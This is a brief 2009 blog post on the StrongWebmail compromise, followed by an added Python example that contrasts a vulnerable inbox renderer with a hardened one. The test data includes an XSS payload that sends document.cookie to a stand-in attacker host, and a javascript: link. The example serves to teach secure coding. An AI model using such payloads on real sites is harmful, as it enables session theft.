Friday, June 5, 2009

quick strongwebmail blurb

so strongwebmail got pwnt, and maybe some hacker peeps are getting paid... gratz all around!

it's interesting that strongwebmail focused so strongly on authentication (at least in the media reports i read prior to the pwnage)... they must've felt very secure that no one was going to find a way to read the PIN sent via SMS to a cell phone...

it's a beautiful hack (imo) to ignore that aspect entirely, sign up for an account, and subvert the system from the inside on the application layer.

seems like maybe strongwebmail got some tunnel vision about their uber 2-factor auth and forgot some simple stuff like input validation and output encoding ;)
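The kind of application-layer slip the post is pointing at, as an added example that is not code from the original post or from StrongWebmail: a hypothetical webmail inbox renderer that drops message fields an ordinary account holder controls straight into HTML, next to a hardened version that encodes for the HTML context and validates the link scheme before placing it in an attribute. The message data, field names and function names are constructed for illustration.

```python
import html
from urllib.parse import urlsplit

# Constructed sample: an attacker who signed up for an ordinary account
# sends a message whose subject and link fields carry markup. Hypothetical data.
ATTACKER_MESSAGE = {
    "sender": "attacker@example.com",
    "subject": '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
    "link": "javascript:alert(document.cookie)",
}

# Constructed sample of a harmless message that still contains angle brackets.
BENIGN_MESSAGE = {
    "sender": "alice@example.com",
    "subject": "Lunch <today>?",
    "link": "https://example.com/menu",
}


def render_inbox_row_vulnerable(msg):
    # Vulnerable: attacker-controlled fields are interpolated into HTML as-is,
    # so the recipient's browser runs the attacker's markup in the webmail origin.
    return (f'<tr><td>{msg["sender"]}</td><td>{msg["subject"]}</td>'
            f'<td><a href="{msg["link"]}">open</a></td></tr>')


def safe_href(url):
    # Input validation for the attribute context: only http(s) URLs are allowed.
    # Escaping alone would not neutralise a javascript: URL, since the browser
    # decodes the attribute value before treating it as a URL.
    scheme = urlsplit(url).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def render_inbox_row_hardened(msg):
    # Output encoding matched to context: element content is HTML-escaped,
    # the href is scheme-validated and attribute-escaped.
    sender = html.escape(msg["sender"], quote=True)
    subject = html.escape(msg["subject"], quote=True)
    href = safe_href(msg["link"])
    return (f'<tr><td>{sender}</td><td>{subject}</td>'
            f'<td><a href="{href}">open</a></td></tr>')


def contains_active_markup(rendered):
    # Crude check for the demo: does the rendered row still carry an executable
    # tag or a script-scheme link?
    lowered = rendered.lower()
    return ("<img" in lowered or "<script" in lowered
            or 'href="javascript:' in lowered)


if __name__ == "__main__":
    for name, fn in (("vulnerable", render_inbox_row_vulnerable),
                     ("hardened", render_inbox_row_hardened)):
        out = fn(ATTACKER_MESSAGE)
        print(f"{name}: active markup survives? {contains_active_markup(out)}")
        print("   ", out)
```

The two fixes are deliberately separate: `html.escape` handles the element-content and attribute-value contexts, but a link target needs validation of the URL scheme as well, because a correctly escaped `javascript:` href is still a script once the browser decodes it.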
